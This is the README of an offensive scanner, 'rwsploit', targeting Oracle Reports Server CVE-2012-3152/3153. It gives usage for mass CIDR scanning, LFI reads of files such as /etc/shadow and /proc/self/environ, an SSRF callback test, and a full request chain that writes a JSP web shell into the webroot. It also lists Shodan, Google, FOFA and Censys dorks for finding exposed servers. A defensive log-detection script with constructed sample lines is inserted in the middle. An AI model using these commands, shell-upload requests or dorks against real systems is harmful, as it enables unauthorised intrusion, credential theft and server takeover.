⚠️ For authorized use only. Only run this tool against systems you own or have explicit written permission to test. Unauthorized use is illegal.
A focused exploitation scanner for Oracle Reports Server (rwservlet) targeting CVE-2012-3152 and CVE-2012-3153 — affecting versions below 11g. Automates detection, LFI file reads, SSRF testing, and JSP shell upload across single IPs, CIDR ranges, or target lists. Smart TCP/HTTP pre-filtering skips dead hosts instantly so no time is wasted.
```
git clone https://github.com/abq0/rwsploit.git
cd rwsploit
pip install requests
```

Python 3.8+ required. No other dependencies.
```
python3 rwsploit.py -t <IP|CIDR> [options]
python3 rwsploit.py -f <file> [options]
```

Run with no arguments to see the full help menu and recon dorks.
| Flag | Description | Default |
|---|---|---|
| `-t` | Target IP, hostname, or CIDR. Multiple values accepted. | — |
| `-f` | File with one IP or CIDR per line. `#` = comment. | — |
| `-p` | Single custom port — overrides the default port list. | 80 443 8080 7777 7778 7779 8443 9090 |
| `-T` | Concurrent threads. | 15 |
| `-o` | Save LFI dumps to disk with this prefix, e.g. `-o loot` → `loot_<ip>_<port>_<file>.txt`. | stdout only |
| `--timeout` | Request timeout in seconds. | 10 |
| `--lfi` | Run LFI file-read payloads. OS is detected first so only relevant payloads run. | off |
| `--no-ssrf` | Skip SSRF webhook test. | off |
| `--shell` | Upload a JSP shell. Prompts for the URL serving your shell content. | off |
| `-h` | Show help and recon dorks. | — |
```
# Detect only
python3 rwsploit.py -t 10.10.10.55 -p 7777

# Detect + LFI
python3 rwsploit.py -t 10.10.10.55 -p 7777 --lfi

# Full chain — LFI + SSRF + shell
python3 rwsploit.py -t 10.10.10.55 -p 7777 --lfi --shell

# Subnet scan, save dumps
python3 rwsploit.py -t 10.10.10.0/24 -p 7777 --lfi -o loot

# From file, no SSRF
python3 rwsploit.py -f targets.txt --lfi --no-ssrf
```

`targets.txt` format:

```
# comment — skipped
10.10.10.55
10.10.11.0/24
```
Reads world-readable files by detecting the OS first via showenv, then running only the matching payload set.
- Linux — `/etc/passwd`, `/etc/shadow`, `/etc/hosts`, `/etc/issue`, `/etc/os-release`, `/etc/group`, `/etc/crontab`, `/etc/timezone`, `/proc/version`, `/proc/cmdline`, `/proc/self/environ`
- Windows — `win.ini`, `system32\drivers\etc\hosts`, `boot.ini`, `system.ini`, `AUTOEXEC.BAT`
🚨 No LFI output does not mean the target is safe — Oracle's config and file permissions vary. Always test SSRF and shell upload independently.
Fires `rwservlet?JOBTYPE=rwurl&URLPARAMETER=<webhook>` and polls the webhook.site API for a callback. Prints the source IP, method, and User-Agent on hit. A fresh webhook token is created automatically at startup.
- Prompts for the URL serving your JSP shell content
- Reads `PATH_TRANSLATED` from `showenv` to get the real webroot path
- Generates a random shell name (e.g. `kxqbrmfa.jsp`)
- Writes it via: `rwservlet?report=xyzzy&destype=file&desname=<webroot\shell.jsp>&JOBTYPE=rwurl&URLPARAMETER=<your URL>`
- Verifies by checking the shell URL for HTTP 200 and prints the live link
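The request shapes used by the LFI, SSRF and shell-upload steps above (`showenv` recon, `JOBTYPE=rwurl&URLPARAMETER=`, `destype=file&desname=`) are also what a defender can hunt for in the Reports Server's HTTP access log. The following detector is an added example and is not part of rwsploit; it assumes common/combined log format, and the sample log lines are constructed.

```python
from __future__ import annotations
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Jan/2024:10:00:01 +0000] "GET /reports/rwservlet/showenv HTTP/1.1" 200 512
203.0.113.10 - - [01/Jan/2024:10:00:02 +0000] "GET /reports/rwservlet?JOBTYPE=rwurl&URLPARAMETER=http%3A%2F%2Fexample.invalid%2Fcb HTTP/1.1" 200 88
203.0.113.10 - - [01/Jan/2024:10:00:03 +0000] "GET /reports/rwservlet?report=xyzzy&destype=file&desname=C%3A%5Cwebroot%5Ckxqbrmfa.jsp&JOBTYPE=rwurl&URLPARAMETER=http%3A%2F%2Fexample.invalid%2Fs HTTP/1.1" 200 120
198.51.100.7 - - [01/Jan/2024:10:05:00 +0000] "GET /reports/rwservlet?report=sales&destype=cache&desformat=pdf HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify_request(target: str) -> list[tuple[str, str]]:
    """Return (severity, reason) findings for one request target (path + query)."""
    parts = urlsplit(target)
    path = parts.path.lower()
    if "rwservlet" not in path:
        return []
    # parse_qs percent-decodes values; keys/values are lower-cased for matching.
    qs = {k.lower(): [v.lower() for v in vs]
          for k, vs in parse_qs(parts.query, keep_blank_values=True).items()}
    findings = []
    if path.endswith(("/showenv", "/getserverinfo")):
        findings.append(("low", "environment/server-info disclosure endpoint"))
    if "rwurl" in qs.get("jobtype", []) and "urlparameter" in qs:
        findings.append(("high", "JOBTYPE=rwurl with URLPARAMETER (SSRF, CVE-2012-3153 pattern)"))
    if "file" in qs.get("destype", []) and "desname" in qs:
        desname = qs["desname"][0]
        sev = "critical" if desname.endswith((".jsp", ".jspx")) else "high"
        findings.append((sev, f"destype=file writing to {desname}"))
    return findings

def scan_log(text: str) -> list[dict]:
    """Run classify_request over every parsable log line; keep source IP and status."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for sev, reason in classify_request(m["target"]):
            hits.append({"ip": m["ip"], "severity": sev, "reason": reason, "status": int(m["status"])})
    return hits

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"[{h['severity']:8}] {h['ip']} {h['status']} {h['reason']}")
```

A 200 on a `destype=file` request is the strongest signal, since it means the server accepted the write; an ordinary `destype=cache` report run produces no finding.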
Google

```
inurl:"/reports/rwservlet" -site:oracle.com
inurl:"/reports/rwservlet/showenv"
inurl:"/reports/rwservlet/getserverinfo"
intitle:"Oracle Reports Server - Authenticate" inurl:rwservlet
```

Shodan

```
http.html:"rwservlet"
http.html:"/reports/rwservlet" http.html:"Oracle"
http.html:"rwservlet/showenv"
http.html:"getserverinfo" http.html:"Oracle Reports"
```

FOFA

```
body="/reports/rwservlet"
body="rwservlet" && body="Oracle Reports"
body="/reports/rwservlet/showenv"
body="getserverinfo" && body="rwservlet"
```

Censys

```
services.http.response.body: "/reports/rwservlet"
services.http.response.body: "rwservlet" and services.http.response.body: "Oracle Reports"
services.http.response.body: "rwservlet/showenv"
services.http.response.html_title: "Oracle Reports"
```
| CVE | Description |
|---|---|
| CVE-2012-3152 | Unauthenticated file read via rwservlet report parameter |
| CVE-2012-3153 | SSRF and file write via JOBTYPE=rwurl + URLPARAMETER |
Affects Oracle Reports Server 6i, 9i, 10g — fixed in 11g.
For authorized penetration testing, CTF challenges, and security research only. The author takes no responsibility for misuse.